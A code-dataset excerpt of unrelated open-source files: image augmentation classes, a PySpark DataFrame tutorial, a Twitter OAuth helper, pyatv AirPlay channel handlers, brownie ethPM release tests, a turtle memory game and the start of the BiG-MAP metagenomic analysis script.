max_offset = np.subtract(input_size, output_size)
max_offset = np.maximum(max_offset, 0)
offset = np.multiply(max_offset, np.random.uniform(0.0, 1.0))
offset = np.round(offset).astype(int)
return CropTransform(
offset[1], offset[0], output_size[1], output_size[0], input_size[1], input_size[0]
)
def _get_pad(self, image: np.ndarray) -> Transform:
# Compute the image scale and scaled size.
input_size = image.shape[:2]
output_size = self.crop_size
# Add padding if the image is scaled down.
pad_size = np.subtract(output_size, input_size)
pad_size = np.maximum(pad_size, 0)
original_size = np.minimum(input_size, output_size)
return PadTransform(
0, 0, pad_size[1], pad_size[0], original_size[1], original_size[0], self.pad_value
)
def get_transform(self, image: np.ndarray) -> TransformList:
transforms = [self._get_crop(image)]
if self.pad:
transforms.append(self._get_pad(image))
return TransformList(transforms)
class RandomCrop(Augmentation):
"""
Randomly crop a rectangle region out of an image.
"""
def __init__(self, crop_type: str, crop_size):
"""
Args:
crop_type (str): one of "relative_range", "relative", "absolute", "absolute_range".
crop_size (tuple[float, float]): two floats, explained below.
- "relative": crop a (H * crop_size[0], W * crop_size[1]) region from an input image of
size (H, W). crop size should be in (0, 1]
- "relative_range": uniformly sample two values from [crop_size[0], 1]
and [crop_size[1]], 1], and use them as in "relative" crop type.
- "absolute" crop a (crop_size[0], crop_size[1]) region from input image.
crop_size must be smaller than the input image size.
- "absolute_range", for an input of size (H, W), uniformly sample H_crop in
[crop_size[0], min(H, crop_size[1])] and W_crop in [crop_size[0], min(W, crop_size[1])].
Then crop a region (H_crop, W_crop).
"""
# TODO style of relative_range and absolute_range are not consistent:
# one takes (h, w) but another takes (min, max)
super().__init__()
assert crop_type in {
"relative_range",
"relative",
"absolute",
"absolute_range",
}
self._init(locals())
def get_transform(self, image):
h, w = image.shape[:2]
croph, cropw = self.get_crop_size((h, w))
assert h >= croph and w >= cropw, "Shape computation in {} has bugs.".format(self)
h0 = np.random.randint(h - croph + 1)
w0 = np.random.randint(w - cropw + 1)
return CropTransform(w0, h0, cropw, croph)
def get_crop_size(self, image_size):
"""
Args:
image_size (tuple): height, width
Returns:
crop_size (tuple): height, width in absolute pixels
"""
h, w = image_size
if self.crop_type == "relative":
ch, cw = self.crop_size
return int(h * ch + 0.5), int(w * cw + 0.5)
elif self.crop_type == "relative_range":
crop_size = np.asarray(self.crop_size, dtype=np.float32)
ch, cw = crop_size + np.random.rand(2) * (1 - crop_size)
return int(h * ch + 0.5), int(w * cw + 0.5)
elif self.crop_type == "absolute":
return (min(self.crop_size[0], h), min(self.crop_size[1], w))
elif self.crop_type == "absolute_range":
assert self.crop_size[0] <= self.crop_size[1]
ch = np.random.randint(min(h, self.crop_size[0]), min(h, self.crop_size[1]) + 1)
cw = np.random.randint(min(w, self.crop_size[0]), min(w, self.crop_size[1]) + 1)
return ch, cw
else:
            raise NotImplementedError("Unknown crop type {}".format(self.crop_type))
class RandomCrop_CategoryAreaConstraint(Augmentation):
"""
Similar to :class:`RandomCrop`, but find a cropping window such that no single category
occupies a ratio of more than `single_category_max_area` in semantic segmentation ground
    truth, which can cause instability in training. The function attempts to find such a valid
cropping window for at most 10 times.
"""
def __init__(
self,
crop_type: str,
crop_size,
single_category_max_area: float = 1.0,
ignored_category: int = None,
):
"""
Args:
crop_type, crop_size: same as in :class:`RandomCrop`
single_category_max_area: the maximum allowed area ratio of a
category. Set to 1.0 to disable
ignored_category: allow this category in the semantic segmentation
ground truth to exceed the area ratio. Usually set to the category
that's ignored in training.
"""
self.crop_aug = RandomCrop(crop_type, crop_size)
self._init(locals())
def get_transform(self, image, sem_seg):
if self.single_category_max_area >= 1.0:
return self.crop_aug.get_transform(image)
h, w = sem_seg.shape
for _ in range(10):
crop_size = self.crop_aug.get_crop_size((h, w))
y0 = np.random.randint(h - crop_size[0] + 1)
x0 = np.random.randint(w - crop_size[1] + 1)
sem_seg_temp = sem_seg[y0 : y0 + crop_size[0], x0 : x0 + crop_size[1]]
labels, cnt = np.unique(sem_seg_temp, return_counts=True)
if self.ignored_category is not None:
cnt = cnt[labels != self.ignored_category]
if len(cnt) > 1 and np.max(cnt) < np.sum(cnt) * self.single_category_max_area:
break
return CropTransform(x0, y0, crop_size[1], crop_size[0])
class RandomExtent(Augmentation):
"""
Outputs an image by cropping a random "subrect" of the source image.
The subrect can be parameterized to include pixels outside the source image,
in which case they will be set to zeros (i.e. black). The size of the output
image will vary with the size of the random subrect.
"""
def __init__(self, scale_range, shift_range):
"""
Args:
scale_range (l, h): Range of input-to-output size scaling factor
shift_range (x, y): Range of shifts of the cropped subrect. The rect
is shifted by [w / 2 * Uniform(-x, x), h / 2 * Uniform(-y, y)],
where (w, h) is the (width, height) of the input image. Set each
component to zero to crop at the image's center.
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
img_h, img_w = image.shape[:2]
# Initialize src_rect to fit the input image.
src_rect = np.array([-0.5 * img_w, -0.5 * img_h, 0.5 * img_w, 0.5 * img_h])
# Apply a random scaling to the src_rect.
src_rect *= np.random.uniform(self.scale_range[0], self.scale_range[1])
# Apply a random shift to the coordinates origin.
src_rect[0::2] += self.shift_range[0] * img_w * (np.random.rand() - 0.5)
src_rect[1::2] += self.shift_range[1] * img_h * (np.random.rand() - 0.5)
# Map src_rect coordinates into image coordinates (center at corner).
src_rect[0::2] += 0.5 * img_w
src_rect[1::2] += 0.5 * img_h
return ExtentTransform(
src_rect=(src_rect[0], src_rect[1], src_rect[2], src_rect[3]),
output_size=(int(src_rect[3] - src_rect[1]), int(src_rect[2] - src_rect[0])),
)
class RandomContrast(Augmentation):
"""
Randomly transforms image contrast.
Contrast intensity is uniformly sampled in (intensity_min, intensity_max).
- intensity < 1 will reduce contrast
- intensity = 1 will preserve the input image
- intensity > 1 will increase contrast
See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html
"""
def __init__(self, intensity_min, intensity_max):
"""
Args:
intensity_min (float): Minimum augmentation
intensity_max (float): Maximum augmentation
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
w = np.random.uniform(self.intensity_min, self.intensity_max)
return BlendTransform(src_image=image.mean(), src_weight=1 - w, dst_weight=w)
class RandomBrightness(Augmentation):
"""
Randomly transforms image brightness.
Brightness intensity is uniformly sampled in (intensity_min, intensity_max).
- intensity < 1 will reduce brightness
- intensity = 1 will preserve the input image
- intensity > 1 will increase brightness
See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html
"""
def __init__(self, intensity_min, intensity_max):
"""
Args:
intensity_min (float): Minimum augmentation
intensity_max (float): Maximum augmentation
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
w = np.random.uniform(self.intensity_min, self.intensity_max)
return BlendTransform(src_image=0, src_weight=1 - w, dst_weight=w)
class RandomSaturation(Augmentation):
"""
Randomly transforms saturation of an RGB image.
Input images are assumed to have 'RGB' channel order.
Saturation intensity is uniformly sampled in (intensity_min, intensity_max).
- intensity < 1 will reduce saturation (make the image more grayscale)
- intensity = 1 will preserve the input image
- intensity > 1 will increase saturation
See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html
"""
def __init__(self, intensity_min, intensity_max):
"""
Args:
intensity_min (float): Minimum augmentation (1 preserves input).
intensity_max (float): Maximum augmentation (1 preserves input).
"""
super().__init__()
self._init(locals())
def get_transform(self, image):
assert image.shape[-1] == 3, "RandomSaturation only works on RGB images"
w = np.random.uniform(self.intensity_min, self.intensity_max)
grayscale = image.dot([0.299, 0.587, 0.114])[:, :, np.newaxis]
return BlendTransform(src_image=grayscale, src_weight=1 - w, dst_weight=w)
class RandomLighting(Augmentation):
"""
The "lighting" augmentation described in AlexNet, using fixed PCA over ImageNet.
Input images are assumed to have 'RGB' channel order.
The degree of color jittering is randomly sampled via a normal distribution,
with standard deviation given by the scale parameter.
"""
def __init__(self, scale):
"""
Args:
scale (float): Standard deviation of principal component weighting.
"""
super().__init__()
self._init(locals())
self.eigen_vecs = np.array(
[[-0.5675, 0.7192, 0.4009], [-0.5808, -0.0045, -0.8140], [-0.5836, -0.6948, 0.4203]]
)
self.eigen_vals = np.array([0.2175, 0.0188, 0.0045])
def get_transform(self, image):
assert image.shape[-1] == 3, "RandomLighting only works on RGB images"
weights = np.random.normal(scale=self.scale, size=3)
return BlendTransform(
src_image=self.eigen_vecs.dot(weights * self.eigen_vals), src_weight=1.0, dst_weight=1.0
)
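# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module). It assumes the
# Transform objects returned by get_transform() expose apply_image(), as the
# fvcore/detectron2 transforms imported above do, and it only uses classes
# defined in this file; the image is random demo data.
if __name__ == "__main__":
    demo_image = (np.random.rand(480, 640, 3) * 255).astype("uint8")
    demo_augs = [
        RandomBrightness(0.9, 1.1),
        RandomContrast(0.8, 1.2),
        RandomCrop("relative", (0.5, 0.5)),
    ]
    out = demo_image
    for aug in demo_augs:
        # each augmentation samples a deterministic Transform, which is then applied
        out = aug.get_transform(out).apply_image(out)
    print("augmented image shape:", out.shape)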
| 37.671164 | 101 | 0.613501 |
4a1e499539aa3c940c600a26cfdaa4668138ff20 | 3,695 | py | Python | jobs/pyspark_job_2.py | blnwrly/cdsw-training | ace71ece16bb9108ad38d426a5ab41955011f2c4 | [
"Apache-2.0"
] | null | null | null | jobs/pyspark_job_2.py | blnwrly/cdsw-training | ace71ece16bb9108ad38d426a5ab41955011f2c4 | [
"Apache-2.0"
] | null | null | null | jobs/pyspark_job_2.py | blnwrly/cdsw-training | ace71ece16bb9108ad38d426a5ab41955011f2c4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Cloudera, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pyspark
from pyspark.sql import SparkSession
spark = SparkSession.builder \
.appName('spark-job') \
.getOrCreate()
flights = spark.read.csv('data/flights.csv', header=True, inferSchema=True)
# ## Transforming Data
# Spark SQL provides a set of functions for manipulating
# Spark DataFrames. Each of these methods returns a
# new DataFrame.
# `select()` returns the specified columns:
flights.select('carrier').show()
# `distinct()` returns distinct rows:
flights.select('carrier').distinct().show()
# `filter()` (or its alias `where()`) returns rows that
# satisfy a Boolean expression.
# To disambiguate column names and literal strings,
# import and use the functions `col()` and `lit()`:
from pyspark.sql.functions import col, lit
flights.filter(col('dest') == lit('SFO')).show()
# `orderBy()` (or its alias `sort()`) returns rows
# arranged by the specified columns:
flights.orderBy('month', 'day').show()
flights.orderBy('month', 'day', ascending=False).show()
# `withColumn()` adds a new column or replaces an existing
# column using the specified expression:
flights \
.withColumn('on_time', col('arr_delay') <= 0) \
.show()
# To concatenate strings, import and use the function
# `concat()`:
from pyspark.sql.functions import concat
flights \
.withColumn('flight_code', concat('carrier', 'flight')) \
.show()
# `agg()` performs aggregations using the specified
# expressions.
# Import and use aggregation functions such as `count()`,
# `countDistinct()`, `sum()`, and `mean()`:
from pyspark.sql.functions import count, countDistinct
flights.agg(count('*')).show()
flights.agg(countDistinct('carrier')).show()
# Use the `alias()` method to assign a name to name the
# resulting column:
flights \
.agg(countDistinct('carrier').alias('num_carriers')) \
.show()
# `groupBy()` groups data by the specified columns, so
# aggregations can be computed by group:
from pyspark.sql.functions import mean
flights \
.groupBy('origin') \
.agg( \
count('*').alias('num_departures'), \
mean('dep_delay').alias('avg_dep_delay') \
) \
.show()
# By chaining together multiple DataFrame methods, you
# can analyze data to answer questions. For example:
# How many flights to SFO departed from each airport,
# and what was the average departure delay (in minutes)?
flights \
.filter(col('dest') == lit('SFO')) \
.groupBy('origin') \
.agg( \
count('*').alias('num_departures'), \
mean('dep_delay').alias('avg_dep_delay') \
) \
.orderBy('avg_dep_delay') \
.show()
# ## Using SQL Queries
# Instead of using Spark DataFrame methods, you can
# use a SQL query to achieve the same result.
# First you must create a temporary view with the
# DataFrame you want to query:
flights.createOrReplaceTempView('nyc_flights_2013')
# Then you can use SQL to query the DataFrame:
spark.sql("""
SELECT origin,
COUNT(*) AS num_departures,
AVG(dep_delay) AS avg_dep_delay
FROM nyc_flights_2013
WHERE dest = 'SFO'
GROUP BY origin
ORDER BY avg_dep_delay""").show()
# ## Cleanup
# Stop the Spark application:
spark.stop()
| 24.966216 | 75 | 0.707442 |
4a1e4997c8f99c301b78532e6e6ac79f8e9dde27 | 5,480 | py | Python | twitterAuthorization/main.py | actlaboratory/twitter-authorization | aa78fd569576d6d81fbf1ace55ad0511e8498b56 | [
"MIT"
] | null | null | null | twitterAuthorization/main.py | actlaboratory/twitter-authorization | aa78fd569576d6d81fbf1ace55ad0511e8498b56 | [
"MIT"
] | null | null | null | twitterAuthorization/main.py | actlaboratory/twitter-authorization | aa78fd569576d6d81fbf1ace55ad0511e8498b56 | [
"MIT"
] | null | null | null | import threading
import wsgiref.util
from wsgiref.simple_server import make_server
import http.server
import socketserver
import socket
import tweepy
import urllib.parse
def server_bind(self):
"""Override server_bind to fix UnicodeDecodeError when computer name has non-ascii characters."""
socketserver.TCPServer.server_bind(self)
host, port = self.server_address[:2]
try:
self.server_name = socket.getfqdn(host)
except UnicodeDecodeError:
self.server_name = "localhost"
self.server_port = port
http.server.HTTPServer.server_bind = server_bind
class TwitterAuthorization:
def __init__(self,consumerKey,consumerSecret,receivePort):
"""
Args:
            consumerKey (string): The consumer key from the Twitter developer portal
            consumerSecret (string): The consumer secret from the Twitter developer portal
            receivePort (int): The port number on which to receive the callback request
"""
self.result=None
self.key = consumerKey
self.secret = consumerSecret
self.port = receivePort
self.localServer = None
#generate request URL
self.tweepy = tweepy.OAuthHandler(self.key, self.secret,"http://localhost:%d" % self.port)
try:
self.url = self.tweepy.get_authorization_url()
except tweepy.TweepError as e:
raise Exception(e)
#start local web server
self.wsgi_app = _RedirectWSGIApp(
self.port,
self._registToken,
self._failedRequest
)
self.localServer = wsgiref.simple_server.make_server("localhost", self.port, self.wsgi_app, handler_class=_WSGIRequestHandler)
thread = threading.Thread(target=self._localServerThread,args=(self.localServer,))
thread.start()
def setMessage(self,lang,success,failed,transfer):
"""
Set Message that viewd in browser
Args:
lang (string): The message language code (ex:ja,en,...)
success (string): The success message
failed (string): The failed message
            transfer (string): The transfer error message shown in old or JavaScript-disabled browsers
"""
self.wsgi_app.setMessage(lang,success,failed,transfer)
def getUrl(self):
"""
Get Authorization url
Returns:
AuthorizationUrl (string)
"""
return self.url
def getToken(self):
"""
        Get the access token (success), "" (failed) or None (waiting)
If returned "" and the browser stays open, software should close that.
Returns:
tokenData (dict) or None
"""
if self.result!=None:
self.shutdown()
return self.result
def _registToken(self,result):
self.result = self.tweepy.get_access_token(result["oauth_verifier"][0])
#(result["oauth_token"][0]
def _failedRequest(self):
self.result=""
def __del__(self):
self.shutdown()
def shutdown(self):
if self.localServer:
self.localServer.shutdown()
self.localServer=None
def _localServerThread(self,server):
server.serve_forever()
class _WSGIRequestHandler(wsgiref.simple_server.WSGIRequestHandler):
def __init__(self,*args,**argv):
        super().__init__(*args, **argv)
        # close the connection after every request
        self.close_connection = True
def log_message(self, *args):
#disable logger
pass
class _RedirectWSGIApp(object):
"""
WSGI app to handle the authorization redirect.
Stores the request URI and displays the given success message.
"""
def __init__(self, port, hook,failedHook):
"""
Args:
port (int): The port number That receive request
hook (callable): The function when got token
failedHook (callable): The function when authorization failed (ex: disagreed authorize)
"""
self.successMessage="Authorization successful. Close this window and go back to your application."
self.failedMessage="Authorization failed. Please try again."
self.transferMessage="If the screen does not change after a while, open this page in another browser."
self.lang = "ja"
self.port = port
self.hook = hook
self.failedHook = failedHook
def setMessage(self,lang,success,failed,transfer):
"""
Set Message that viewd in browser
Args:
lang (string): The message language code (ex:ja,en,...)
success (string): The success message
failed (string): The failed message
            transfer (string): The transfer error message shown in old or JavaScript-disabled browsers
"""
self.lang=lang
self.successMessage=success
self.failedMessage=failed
self.transferMessage=transfer
def __call__(self, environ, start_response):
"""
Args:
environ (Mapping[str, Any]): The WSGI environment.
start_response (Callable[str, list]): The WSGI start_response
callable.
Returns:
Iterable[bytes]: The response body.
"""
try:
uri = wsgiref.util.request_uri(environ)
query = urllib.parse.urlparse(uri).query
queryDic = urllib.parse.parse_qs(query)
            # if no exception is raised, the request is valid
            # handle it on the server side
if query != "":
self.hook(queryDic)
start_response('200 OK', [('Content-type', 'text/html; charset=utf-8')])
response=[("<html lang='"+self.lang+"'><head><title>Authorization result</title><meta charset='utf-8'></head><body>"+self.successMessage+"<script><!--\n").encode('utf-8')]
response.append("window.close()\n".encode("utf-8"))
response.append("--></script></body></html>".encode("utf-8"))
return response
except Exception as e:
if query != "": #favicon.icoなどの不要なリクエストへの対策
self.failedHook()
start_response('400 Bad Request', [('Content-type', 'text/html; charset=utf-8')])
return [("<html lang='"+self.lang+"'><head><title>Authorization result</title><meta charset='utf-8'></head><body>"+self.failedMessage+"</body></html>").encode('utf-8')]
| 30.444444 | 174 | 0.722628 |
4a1e4ae4db84af55f455ef3dadbda5811961549a | 5,607 | py | Python | pyatv/protocols/airplay/channels.py | Jacobs4/pyatv | 52956adf3b79198be52cc03649f3ddeee19f9e6c | [
"MIT"
] | 532 | 2017-02-01T19:23:28.000Z | 2022-03-29T09:57:39.000Z | pyatv/protocols/airplay/channels.py | Jacobs4/pyatv | 52956adf3b79198be52cc03649f3ddeee19f9e6c | [
"MIT"
] | 1,639 | 2017-02-01T19:22:04.000Z | 2022-03-31T17:26:40.000Z | pyatv/protocols/airplay/channels.py | bdraco/pyatv | 9541d21e6101c60866d832626be97bf962774cd5 | [
"MIT"
] | 102 | 2017-02-02T01:42:13.000Z | 2022-02-26T08:49:34.000Z | """Logic related to logical AirPlay channels.
This module only deals with AirPlay 2 related channels right now.
"""
from abc import ABC
import logging
import plistlib
from random import randrange
from typing import Optional
from pyatv.auth.hap_channel import AbstractHAPChannel
from pyatv.protocols.mrp import protobuf
from pyatv.support.http import parse_request
from pyatv.support.packet import defpacket
from pyatv.support.variant import read_variant, write_variant
_LOGGER = logging.getLogger(__name__)
DATA_HEADER_PADDING = 0x00000000
DataHeader = defpacket(
"DataFrame", size="I", message_type="12s", command="4s", seqno="Q", padding="I"
)
class EventChannel(AbstractHAPChannel):
"""Connection used to handle the event channel."""
def handle_received(self) -> None:
"""Handle received data that was put in buffer."""
self.buffer: bytes
while self.buffer:
try:
request, self.buffer = parse_request(self.buffer)
if request is None:
_LOGGER.debug("Not enough data to parse request on event channel")
break
_LOGGER.debug("Got message on event channel: %s", request)
# Send a positive response to satisfy the other end of the channel
# TODO: Add public method to pyatv.http to format a message
headers = {
"Content-Length": 0,
"Audio-Latency": 0,
"Server": request.headers.get("Server"),
"CSeq": request.headers.get("CSeq"),
}
response = (
f"{request.protocol}/{request.version} 200 OK\r\n"
+ "\r\n".join(f"{key}: {value}" for key, value in headers.items())
+ "\r\n\r\n"
)
self.send(response.encode("utf-8"))
except Exception:
_LOGGER.exception("Failed to handle message on event channel")
class DataStreamListener(ABC):
"""Listener interface for DataStreamChannel."""
def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:
"""Handle incoming protobuf message."""
def handle_connection_lost(self, exc: Optional[Exception]) -> None:
"""Device connection was dropped."""
class DataStreamChannel(AbstractHAPChannel):
"""Connection used to handle the data stream channel."""
def __init__(self, output_key: bytes, input_key: bytes) -> None:
"""Initialize a new DataStreamChannel instance."""
super().__init__(output_key, input_key)
self.send_seqno = randrange(0x100000000, 0x1FFFFFFFF)
def connection_lost(self, exc: Optional[Exception]) -> None:
"""Device connection was dropped."""
self.listener.handle_connection_lost(exc)
def handle_received(self) -> None:
"""Handle received data that was put in buffer."""
self.buffer: bytes
while len(self.buffer) >= DataHeader.length:
header = DataHeader.decode(self.buffer, allow_excessive=True)
if len(self.buffer) < header.size:
_LOGGER.debug(
"Not enough data on data channel (has %d, expects %d)",
len(self.buffer),
header.size,
)
break
try:
self._process_message_from_buffer(header)
except Exception:
_LOGGER.exception("failed to process data frame")
self.buffer = self.buffer[header.size :]
def _process_message_from_buffer(self, header) -> None:
# Decode payload and process it
payload = plistlib.loads(self.buffer[DataHeader.length : header.size])
if payload:
self._process_payload(payload)
# If this was a request, send a reply to satisfy other end
if header.message_type.startswith(b"sync"):
self.send(
DataHeader.encode(
DataHeader.length,
b"rply" + 8 * b"\x00",
4 * b"\x00",
header.seqno,
DATA_HEADER_PADDING,
)
)
def _process_payload(self, message) -> None:
data = message.get("params", {}).get("data")
if data is None:
_LOGGER.debug("Got message with unsupported format: %s", message)
return
while data:
length, raw = read_variant(data)
if len(raw) < length:
_LOGGER.warning("Expected %d bytes, got %d", length, len(raw))
return
message = raw[:length]
data = raw[length:]
pb_msg = protobuf.ProtocolMessage()
pb_msg.ParseFromString(message)
self.listener.handle_protobuf(pb_msg)
def send_protobuf(self, message: protobuf.ProtocolMessage) -> None:
"""Serialize a protobuf message and send it to receiver."""
serialized_message = message.SerializeToString()
serialized_length = write_variant(len(serialized_message))
payload = plistlib.dumps(
{"params": {"data": serialized_length + serialized_message}},
fmt=plistlib.FMT_BINARY, # pylint: disable=no-member
)
self.send(
DataHeader.encode(
DataHeader.length + len(payload),
b"sync" + 8 * b"\x00",
b"comm",
self.send_seqno,
DATA_HEADER_PADDING,
)
+ payload
)
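# ---------------------------------------------------------------------------
# Illustrative sketch (not part of pyatv): round-trip of the varint length-prefix
# framing used by send_protobuf() and _process_payload() above, using only the
# read_variant/write_variant helpers already imported in this module.
def _framing_demo(serialized_message: bytes) -> bytes:
    framed = write_variant(len(serialized_message)) + serialized_message
    length, remaining = read_variant(framed)
    assert remaining[:length] == serialized_message  # the prefix recovers the payload
    return framed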
| 35.487342 | 86 | 0.582665 |
4a1e4b99343e69f8139d521978ee690c9bc50c23 | 1,975 | py | Python | Python/memory.py | RALE0/TC1001S.100-202211 | 5b7f1868729ca092bb3ec347e7eaca40d02976cb | [
"MIT"
] | null | null | null | Python/memory.py | RALE0/TC1001S.100-202211 | 5b7f1868729ca092bb3ec347e7eaca40d02976cb | [
"MIT"
] | null | null | null | Python/memory.py | RALE0/TC1001S.100-202211 | 5b7f1868729ca092bb3ec347e7eaca40d02976cb | [
"MIT"
] | 1 | 2022-03-25T00:09:14.000Z | 2022-03-25T00:09:14.000Z | """Memory, puzzle game of number pairs.
Exercises:
1. Count and print how many taps occur.
2. Decrease the number of tiles to a 4x4 grid.
3. Detect when all tiles are revealed.
4. Center single-digit tile.
5. Use letters instead of tiles.
"""
from random import *
from turtle import *
from freegames import path
"""
Count and display the number of taps
"""
taps =0
car = path('car.gif')
tiles = list(range(32)) * 2
state = {'mark': None}
hide = [True] * 64
def square(x, y):
"Draw white square with black outline at (x, y)."
up()
goto(x, y)
down()
color('black', 'white')
begin_fill()
for count in range(4):
forward(50)
left(90)
end_fill()
def index(x, y):
"Convert (x, y) coordinates to tiles index."
return int((x + 200) // 50 + ((y + 200) // 50) * 8)
def xy(count):
"Convert tiles count to (x, y) coordinates."
return (count % 8) * 50 - 200, (count // 8) * 50 - 200
def tap(x, y):
"Update mark and hidden tiles based on tap."
spot = index(x, y)
mark = state['mark']
global taps
"Contar y desplegar el numero de taps"
if mark is None or mark == spot or tiles[mark] != tiles[spot]:
state['mark'] = spot
taps += 1
print(taps)
"""
        Count and display the number of taps
"""
else:
hide[spot] = False
hide[mark] = False
state['mark'] = None
def draw():
"Draw image and tiles."
clear()
goto(0, 0)
shape(car)
stamp()
for count in range(64):
if hide[count]:
x, y = xy(count)
square(x, y)
mark = state['mark']
if mark is not None and hide[mark]:
x, y = xy(mark)
up()
goto(x + 2, y)
color('black')
write(tiles[mark], font=('Arial', 30, 'normal'))
update()
ontimer(draw, 100)
shuffle(tiles)
setup(420, 420, 370, 0)
addshape(car)
hideturtle()
tracer(False)
onscreenclick(tap)
draw()
done()
| 19.949495 | 66 | 0.567089 |
4a1e4dfac54e64272a2e2d8d84e7f7381649cbf0 | 2,606 | py | Python | tests/cli/test_cli_ethpm_release.py | ETCCooperative/brownie | 72701c0810058c769412294d4d557af52c9d9932 | [
"MIT"
] | null | null | null | tests/cli/test_cli_ethpm_release.py | ETCCooperative/brownie | 72701c0810058c769412294d4d557af52c9d9932 | [
"MIT"
] | null | null | null | tests/cli/test_cli_ethpm_release.py | ETCCooperative/brownie | 72701c0810058c769412294d4d557af52c9d9932 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import json
import pytest
from brownie._cli import ethpm as cli_ethpm
from brownie.exceptions import UnknownAccount
from brownie.project import ethpm
ETHPM_CONFIG = {
"package_name": "testpackage",
"version": "1.0.0",
"settings": {"deployment_networks": False, "include_dependencies": False},
}
@pytest.fixture
def registry(ipfs_mock, testproject, accounts, monkeypatch):
monkeypatch.setattr("brownie._cli.ethpm.network.connect", lambda k: True)
with testproject._path.joinpath("ethpm-config.yaml").open("w") as fp:
json.dump(ETHPM_CONFIG, fp)
yield testproject.PackageRegistry.deploy({"from": accounts[0]})
@pytest.fixture(autouse=True)
def mocker_spy(mocker):
mocker.spy(ethpm, "create_manifest")
mocker.spy(ethpm, "verify_manifest")
mocker.spy(ethpm, "release_package")
def test_release_localaccount(registry, accounts, tp_path, monkeypatch, tmpdir):
monkeypatch.setattr("brownie.network.account.getpass", lambda x: "")
a = accounts.add()
a.save(tmpdir + "/release_tester.json")
accounts[0].transfer(a, "1 ether")
accounts._reset()
cli_ethpm._release(tp_path, registry.address, tmpdir + "/release_tester.json")
assert ethpm.create_manifest.call_count == 1
assert ethpm.verify_manifest.call_count == 1
assert ethpm.release_package.call_count == 1
id_ = registry.getReleaseId("testpackage", "1.0.0")
assert registry.getReleaseData(id_)[-1] == ethpm.create_manifest.return_value[1]
def test_release_account(registry, accounts, tp_path):
cli_ethpm._release(tp_path, registry.address, accounts[0].address)
assert ethpm.create_manifest.call_count == 1
assert ethpm.verify_manifest.call_count == 1
assert ethpm.release_package.call_count == 1
id_ = registry.getReleaseId("testpackage", "1.0.0")
assert registry.getReleaseData(id_)[-1] == ethpm.create_manifest.return_value[1]
def test_release_unknown_account(registry, accounts, tp_path):
with pytest.raises(UnknownAccount):
cli_ethpm._release(tp_path, registry.address, "0x2a8638962741B4fA728983A6C0F57080522aa73a")
def raise_exception(e):
raise e
def test_exceptions(registry, accounts, tp_path, monkeypatch):
monkeypatch.setattr(
"brownie.project.ethpm.release_package",
lambda registry_address, account, package_name, version, uri: raise_exception(
Exception("foobar")
),
)
cli_ethpm._release(tp_path, registry.address, accounts[0].address)
assert ethpm.create_manifest.call_count == 1
assert ethpm.verify_manifest.call_count == 0
| 32.987342 | 99 | 0.734459 |
4a1e4e32758d82fc47be67fa4fded8b1d2e59097 | 49,837 | py | Python | src/BiG-MAP.analyse.py | medema-group/BiG-MAP | 5a11f63e9484c25e254ccfd2dc96cbbf79f0f9e0 | [
"MIT"
] | 12 | 2020-05-06T14:42:08.000Z | 2022-02-18T15:19:16.000Z | src/BiG-MAP.analyse.py | medema-group/BiG-MAP | 5a11f63e9484c25e254ccfd2dc96cbbf79f0f9e0 | [
"MIT"
] | 13 | 2020-11-02T15:47:51.000Z | 2022-02-06T12:10:03.000Z | src/BiG-MAP.analyse.py | medema-group/BiG-MAP | 5a11f63e9484c25e254ccfd2dc96cbbf79f0f9e0 | [
"MIT"
] | 5 | 2020-03-03T14:33:27.000Z | 2021-09-29T10:22:04.000Z | #!/usr/bin/env python3
"""
--------------- Analyse module ---------------
Authors: Hannah Augustijn, Koen van den Berg, Victoria Pascal Andreu
University: Wageningen University and Research
Department: Department of Bioinformatics
Date: 09/03/2020
----------------------------------------------
This script performs a statistical analysis of the
metagenomic/metatranscriptomic samples. First, the script
normalizes and filters the data. Next, the best-covered gene
clusters can be inspected, and the Kruskal-Wallis and fitZIG models
are used to compute differentially abundant/expressed gene clusters.
Benjamini-Hochberg FDR correction compensates for multiple hypothesis testing.
The output of the script consists of heatmaps in PDF format.
"""
# Import statements:
import os.path
import subprocess
import sys
import argparse
import re
import shutil
import json
import pandas as pd
import numpy as np
from scipy.stats import mstats
from statsmodels.stats.multitest import fdrcorrection
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from rpy2.robjects.packages import importr, STAP
import rpy2.robjects.packages as rpackages
######################################################################
# Argparse functionality
######################################################################
def get_arguments():
"""Parsing the arguments"""
parser = argparse.ArgumentParser(description="",
usage='''
______________________________________________________________________
BiG-MAP analyse: analyse the biom-outputs (ZIG/Kruskal-Wallis)
______________________________________________________________________
Generic command: python3 BiG-MAP.analyse.py --explore --compare
-B [biom_file] -T [SampleType] -M [meta_group] -O [outdir] [options*]
Tests the present biom file using either a fitZIG model or a
Kruskal-Wallis model.
Obligatory arguments:
-B Provide the Biom file here
-T Metagenomic/metatranscriptomic
-M provide the metagroup here. This is the first column in the
options output. Examples: DiseaseStatus, Longitude, etc...
-O Put path to the output folder where the results should be
deposited. Default = current folder (.)
--explore Explore the best covered gene clusters.
-t Optional argument for -explore: adjust the
amount of displayed gene clusters. Default = 20.
-fe File name for explore heatmap. Default = explore_heatmap.
--compare Make a comparison between two groups using fitZIG and Kruskal-Wallis.
-g Space separated list of 2 groups that are to be compared.
Example: UC and Control --> UC Control.
-af Alpha value to determine significance of the fitZIG model. Default=0.05.
-ak Alpha value to determine significance of the Kruskal Wallis model. Default=0.05.
-fc Output file names for Kruskal Wallis and fitZIG heatmaps. Input first the
name for Kruskal Wallis, then for fitZIG. Example: map1_kruskall map2_fitZIG.
Default = [group1]vs[group2]_[kw/fz].
_____________________________________________________________
''')
parser.add_argument("-B", "--biom_file",
help=argparse.SUPPRESS, required=True)
